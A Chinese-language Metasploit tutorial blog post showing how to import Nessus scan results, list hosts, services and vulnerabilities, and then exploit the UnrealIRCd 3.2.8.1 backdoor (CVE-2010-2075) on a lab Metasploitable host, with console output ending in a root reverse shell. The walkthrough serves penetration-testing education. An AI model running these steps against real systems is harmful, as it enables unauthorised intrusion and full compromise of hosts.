Metasploit与Nessus合作

什么是Nessus?

Nessus是一款非常着名且流行的漏洞扫描程序,免费用于个人,非商业用途,该程序于1998年由Renaurd Deraison首次发布,目前由Tenable Network Security(https://www.tenable.com/)发布。还有一个名为OpenVAS的Nessus 2的衍生项目,该项目是在GPL下发布的。使用Nessus中的大量漏洞检查(称为插件),您可以识别大量众所周知的漏洞。Metasploit将以nbe文件格式接受来自Nessus和OpenVAS的漏洞扫描结果文件。

 

我们来看看这个过程。首先我们从Nessus完成扫描:Nessus漏洞扫描

 

完成漏洞扫描后,我们将结果保存为nbe格式,然后启动msfconsole。接下来,我们需要将结果导入Metasploit框架。让我们看看‘help'命令。

msf > load nessus
[*] Nessus Bridge for Metasploit
[*] Type nessus_help for a command listing
[*] Successfully loaded plugin: Nessus
msf > help

Command                     Help Text
-------                     ---------
通 用 命 令           
-----------------           -----------------
nessus_connect              连接到Nessus服务器
nessus_logout               L从Nessus服务器注销
nessus_login                使用不同的用户名和密码登录连接的Nesssus服务器
nessus_save                 将登录用户的凭证保存到nessus.yml
nessus_help                 可用的nessus命令列表
nessus_server_properties    服务器属性,如提要类型,版本,插件集和服务器UUID。
nessus_server_status        检查您的Nessus服务器的状态
nessus_admin                检查用户是否是管理员
nessus_template_list        列出扫描或策略模板
nessus_folder_list          列出Nessus服务器上的所有已配置文件夹
nessus_scanner_list         列出Nessus服务器上配置的所有扫描仪

Nessus 数 据 库 命 令    
-----------------           -----------------
nessus_db_scan              创建对db_hosts中所有IP地址的扫描
nessus_db_scan_workspace    创建一个给定工作区的db_hosts中所有IP地址的扫描
nessus_db_import            将Nessus扫描导入Metasploit连接的数据库
                            
报 告 命 令            
-----------------           -----------------
nessus_report_hosts         从报告中获取主机列表
nessus_report_vulns         从报告中获取隐藏的列表
nessus_report_host_details  从主机上的报告项获取详细信息
                            
扫 描 命 令               
-----------------           -----------------
nessus_scan_list            所有当前Nessus扫描的列表
nessus_scan_new             创建一个新的Nessus扫描
nessus_scan_launch          启动新创建的扫描。 新扫描需要通过此命令手动启动
nessus_scan_pause           暂停正在运行的Nessus扫描
nessus_scan_pause_all       暂停所有正在运行的Nessus扫描
nessus_scan_stop            停止运行或暂停的Nessus扫描
nessus_scan_stop_all        停止所有正在运行或暂停的Nessus扫描
nessus_scan_resume          继续进行传递的Nessus扫描
nessus_scan_resume_all      恢复所有暂停的Nessus扫描
nessus_scan_details         返回给定扫描的详细信息
nessus_scan_export          以Nessus,HTML,PDF,CSV或DB格式导出扫描结果
nessus_scan_export_status   检查导出的扫描的状态
                            
插 件 命 令            
-----------------           -----------------
nessus_plugin_list          列出特定插件系列中的所有插件。
nessus_family_list          列出所有插件系列以及相应的系列ID和插件数量。
nessus_plugin_details       列出特定插件的详细信息
                            
用 户 命 令               
-----------------           -----------------
nessus_user_list            显示Nessus用户
nessus_user_add             添加一个新的Nessus用户
nessus_user_del             删除一个Nessus用户
nessus_user_passwd          更改Nessus用户密码
                            
策 略 命 令             
-----------------           -----------------
nessus_policy_list          列出所有的策略
nessus_policy_del           删除一项策略

 

让我们继续并通过发出db_import命令并跟随结果文件的路径来导入nbe 结果文件。

msf > db_import /root/Nessus/nessus_scan.nbe
[*] Importing 'Nessus NBE Report' data
[*] Importing host 172.16.194.254
[*] Importing host 172.16.194.254
[*] Importing host 172.16.194.254
[*] Importing host 172.16.194.2
[*] Importing host 172.16.194.2
[*] Importing host 172.16.194.2
...略...
[*] Importing host 172.16.194.1
[*] Importing host 172.16.194.1
[*] Importing host 172.16.194.1
[*] Importing host 172.16.194.1
[*] Importing host 172.16.194.1
[*] Successfully imported /root/Nessus/nessus_scan.nbe
msf > 

 

导入结果文件后,我们可以执行hosts命令来列出nbe结果文件中的主机。

msf > hosts

Hosts
=====

address         mac  name    os_name                                                                             os_flavor  os_sp  purpose  info  comments
-------         ---  ----    -------                                                                             ---------  -----  -------  ----  --------
172.16.194.1                 one of these operating systems : \nMac OS X 10.5\nMac OS X 10.6\nMac OS X 10.7\n                      device         
172.16.194.2                 Unknown                                                                                               device         
172.16.194.134               Microsoft Windows                                                                   XP         SP2    client         
172.16.194.148               Linux Kernel 2.6 on Ubuntu 8.04 (hardy)\n                                                             device         
172.16.194.163               Linux Kernel 3.2.6 on Ubuntu 10.04\n                                                                  device         
172.16.194.165       phpcgi  Linux phpcgi 2.6.32-38-generic-pae #83-Ubuntu SMP Wed Jan 4 12:11:13 UTC 2017 i686                    device         
172.16.194.172               Linux Kernel 2.6 on Ubuntu 8.04 (hardy)\n                                                             device                                                                                                                                          

msf >

 

我们确切地看到我们期待的是什么。接下来,我们执行services命令,它将枚举扫描系统上检测到的所有服务。

msf > services 172.16.194.172

Services
========

host            port   proto  name            state  info
----            ----   -----  ----            -----  ----
172.16.194.172  21     tcp    ftp             open   
172.16.194.172  22     tcp    ssh             open   
172.16.194.172  23     tcp    telnet          open   
172.16.194.172  25     tcp    smtp            open   
172.16.194.172  53     udp    dns             open   
172.16.194.172  53     tcp    dns             open   
172.16.194.172  69     udp    tftp            open   
172.16.194.172  80     tcp    www             open   
172.16.194.172  111    tcp    rpc-portmapper  open   
172.16.194.172  111    udp    rpc-portmapper  open   
172.16.194.172  137    udp    netbios-ns      open   
172.16.194.172  139    tcp    smb             open   
172.16.194.172  445    tcp    cifs            open   
172.16.194.172  512    tcp    rexecd          open   
172.16.194.172  513    tcp    rlogin          open   
172.16.194.172  514    tcp    rsh             open   
172.16.194.172  1099   tcp    rmi_registry    open   
172.16.194.172  1524   tcp                    open   
172.16.194.172  2049   tcp    rpc-nfs         open   
172.16.194.172  2049   udp    rpc-nfs         open   
172.16.194.172  2121   tcp    ftp             open   
172.16.194.172  3306   tcp    mysql           open   
172.16.194.172  5432   tcp    postgresql      open   
172.16.194.172  5900   tcp    vnc             open   
172.16.194.172  6000   tcp    x11             open   
172.16.194.172  6667   tcp    irc             open   
172.16.194.172  8009   tcp    ajp13           open   
172.16.194.172  8787   tcp                    open   
172.16.194.172  45303  udp    rpc-status      open   
172.16.194.172  45765  tcp    rpc-mountd      open   
172.16.194.172  47161  tcp    rpc-nlockmgr    open   
172.16.194.172  50410  tcp    rpc-status      open   
172.16.194.172  52843  udp    rpc-nlockmgr    open   
172.16.194.172  55269  udp    rpc-mountd      open 

 

最后,最重要的是,vulns命令将列出Nessus报告并记录在结果文件中的所有漏洞。发布help vulns 将为我们提供这个命令的许多选择。我们将通过端口号来过滤搜索以减轻命令的输出。

msf > help vulns
Print all vulnerabilities in the database

Usage: vulns [addr range]

  -h,--help             Show this help information
  -p,--port >portspec>  List vulns matching this port spec
  -s >svc names>        List vulns matching these service names
  -S,--search           Search string to filter by
  -i,--info             Display Vuln Info

Examples:
  vulns -p 1-65536          # only vulns with associated services
  vulns -p 1-65536 -s http  # identified as http on any port

msf >

 

msf > vulns -p 139
[*] Time: 2012-06-15 18:32:26 UTC Vuln: host=172.16.194.134 name=NSS-11011 refs=NSS-11011 
[*] Time: 2012-06-15 18:32:23 UTC Vuln: host=172.16.194.172 name=NSS-11011 refs=NSS-11011 

msf > vulns -p 22
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.148 name=NSS-10267 refs=NSS-10267 
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.148 name=NSS-22964 refs=NSS-22964 
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.148 name=NSS-10881 refs=NSS-10881 
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.148 name=NSS-39520 refs=NSS-39520 
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.163 name=NSS-39520 refs=NSS-39520 
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.163 name=NSS-25221 refs=NSS-25221 
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.163 name=NSS-10881 refs=NSS-10881 
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.163 name=NSS-10267 refs=NSS-10267 
[*] Time: 2017-06-15 18:32:25 UTC Vuln: host=172.16.194.163 name=NSS-22964 refs=NSS-22964 
[*] Time: 2017-06-15 18:32:24 UTC Vuln: host=172.16.194.172 name=NSS-39520 refs=NSS-39520 
[*] Time: 2017-06-15 18:32:24 UTC Vuln: host=172.16.194.172 name=NSS-10881 refs=NSS-10881 
[*] Time: 2017-06-15 18:32:24 UTC Vuln: host=172.16.194.172 name=NSS-32314 refs=CVE-2008-0166,BID-29179,OSVDB-45029,CWE-310,NSS-32314 
[*] Time: 2017-06-15 18:32:24 UTC Vuln: host=172.16.194.172 name=NSS-10267 refs=NSS-10267 
[*] Time: 2017-06-15 18:32:24 UTC Vuln: host=172.16.194.172 name=NSS-22964 refs=NSS-22964 

msf > vulns 172.16.194.172 -p 6667
[*] Time: 2017-06-15 18:32:23 UTC Vuln: host=172.16.194.172 name=NSS-46882 refs=CVE-2010-2075,BID-40820,OSVDB-65445,NSS-46882 
[*] Time: 2017-06-15 18:32:23 UTC Vuln: host=172.16.194.172 name=NSS-11156 refs=NSS-11156 
[*] Time: 2017-06-15 18:32:23 UTC Vuln: host=172.16.194.172 name=NSS-17975 refs=NSS-17975 
msf >

 

让我们选择与Nessus发现的6667端口相关的CVE,看看Metasploit是否有任何相关信息。我们将从msfconsole和CVE编号发出search 命令。

msf > search cve:2010-2075

Matching Modules
================

   Name                                        Disclosure Date  Rank       Description
   ----                                        ---------------  ----       -----------
   exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  UnrealIRCD 3.2.8.1 Backdoor Command Execution


msf >

 

我们看到Metasploit为此漏洞提供了一个工作模块。下一步是使用该模块,设置适当的选项并执行漏洞利用。

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf  exploit(unreal_ircd_3281_backdoor) > exploit

[*] Started reverse double handler
[*] Connected to 172.16.194.172:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Q4SefN7pIVSQUL2F;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Q4SefN7pIVSQUL2F\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:35941) at 2017-06-15 15:08:51 -0400

ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:d1:62:80  
          inet addr:172.16.194.172  Bcast:172.16.194.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fed1:6280/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:290453 errors:0 dropped:0 overruns:0 frame:0
          TX packets:402340 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:41602322 (39.6 MB)  TX bytes:344600671 (328.6 MB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:774 errors:0 dropped:0 overruns:0 frame:0
          TX packets:774 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:343253 (335.2 KB)  TX bytes:343253 (335.2 KB)

id
uid=0(root) gid=0(root)

 

如您所见,将Nessus扫描结果导入Metasploit是一项强大的功能。这证明了框架的多功能性,以及与第三方工具(如Nessus)集成的一些可能性。

    A+
发布日期:2018年05月14日 22:46:28  所属分类:Metasploit
最后更新时间:2018-05-14 23:10:02
付杰
  • ¥ 1.0元
  • 市场价:9.9元
  • ¥ 29.99元
  • 市场价:888元
  • ¥ 68.0元
  • 市场价:128.0元
  • ¥ 149.0元
  • 市场价:299.0元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: